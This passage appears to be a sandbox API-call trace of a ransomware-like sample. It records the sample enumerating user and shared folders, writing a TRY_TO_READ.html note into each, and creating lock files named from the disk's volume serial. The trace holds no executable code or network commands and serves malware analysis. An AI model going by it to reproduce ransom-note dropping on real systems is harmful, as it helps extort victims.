hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0068.649] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.649] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.649] GetLastError () returned 0x0 [0068.649] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\microsoft help\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.651] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.651] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.652] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.652] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.652] CloseHandle (hObject=0x46c) returned 1 [0068.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b798 | out: hHeap=0x410000) returned 1 [0068.653] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0068.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.653] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.653] GetLastError () returned 0x0 [0068.653] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\mozilla\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.653] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.653] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.654] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.654] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.654] CloseHandle (hObject=0x46c) returned 1 [0068.654] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.654] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.654] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.654] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454280 | out: hHeap=0x410000) returned 1 [0068.655] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0068.655] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.655] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.655] GetLastError () returned 0x0 [0068.655] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\oracle\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.657] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.657] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.658] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.658] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.658] CloseHandle (hObject=0x46c) returned 1 [0068.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4b40 | out: hHeap=0x410000) returned 1 [0068.659] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0068.659] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.659] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.659] GetLastError () returned 0x0 [0068.659] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.661] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0068.661] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.662] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.662] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.662] CloseHandle (hObject=0x46c) returned 1 [0068.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458b88 | out: hHeap=0x410000) returned 1 [0068.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.662] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.663] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b7f0 | out: hHeap=0x410000) returned 1 [0068.663] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0068.663] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.663] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.663] GetLastError () returned 0x0 [0068.663] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Start Menu\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\start menu\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.663] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.663] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.664] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.664] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.664] CloseHandle (hObject=0x46c) returned 1 [0068.665] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.665] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.665] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.665] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4b88 | out: hHeap=0x410000) returned 1 [0068.665] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0068.665] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.665] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.665] GetLastError () returned 0x0 [0068.665] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Sun\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\sun\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.666] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.666] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.667] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.667] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.667] CloseHandle (hObject=0x46c) returned 1 [0068.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0068.668] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0068.668] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.668] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.668] GetLastError () returned 0x0 [0068.668] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Templates\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\templates\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x46c [0068.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b1ae8 | out: hHeap=0x410000) returned 1 [0068.669] WriteFile (in: hFile=0x46c, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0068.670] WriteFile (in: hFile=0x46c, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0068.670] WriteFile (in: hFile=0x46c, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0068.670] CloseHandle (hObject=0x46c) returned 1 [0068.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2780 | out: hHeap=0x410000) returned 1 [0068.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0068.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b4bd0 | out: hHeap=0x410000) returned 1 [0068.670] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2d050, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0068.670] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.670] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.670] GetLastError () returned 0x0 [0068.670] FindNextFileW (in: hFindFile=0x48e870, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2d050, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0068.671] CloseHandle (hObject=0x3cc) returned 1 [0068.671] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.671] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x8, wMilliseconds=0xf7)) [0068.671] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0068.671] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0068.671] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0068.671] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Default User9c354ca09c354b444c.lock") returned 45 [0068.671] CreateFileW (lpFileName="C:\\\\Users\\Default User9c354ca09c354b444c.lock" (normalized: "c:\\users\\default user9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0068.672] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.672] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.672] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.672] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470aa0 | out: hHeap=0x410000) returned 1 [0068.672] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0068.672] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f5e0 | out: hHeap=0x410000) returned 1 [0068.672] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default User\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2d050, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30a2d050, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a2d050, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0068.672] CloseHandle (hObject=0x3cc) returned 1 [0068.675] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0068.675] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x8, wMilliseconds=0x107)) [0068.675] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0068.675] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0068.675] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0068.676] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\Public9c354ca09c354b444c.lock") returned 39 [0068.676] CreateFileW (lpFileName="C:\\\\Users\\Public9c354ca09c354b444c.lock" (normalized: "c:\\users\\public9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0068.676] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.676] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.676] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0068.676] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.676] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470bb8 | out: hHeap=0x410000) returned 1 [0068.676] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f5b8 | out: hHeap=0x410000) returned 1 [0068.676] FindFirstFileW (in: lpFileName="C:\\\\Users\\Public\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30a531b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a531b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48e8b0 [0068.676] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457f50 | out: hHeap=0x410000) returned 1 [0068.676] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.676] GetLastError () returned 0x0 [0068.676] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30a531b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30a531b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.677] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.677] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.677] GetLastError () returned 0x0 [0068.677] FindNextFileW (in: hFindFile=0x48e8b0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x328f8cf0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x328f8cf0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0068.677] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0068.677] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0068.677] GetLastError () returned 0x0 [0068.677] CreateFileW (lpFileName="C:\\\\Users\\Public\\Desktop\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\desktop\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x470 [0068.677] HeapFree (in: 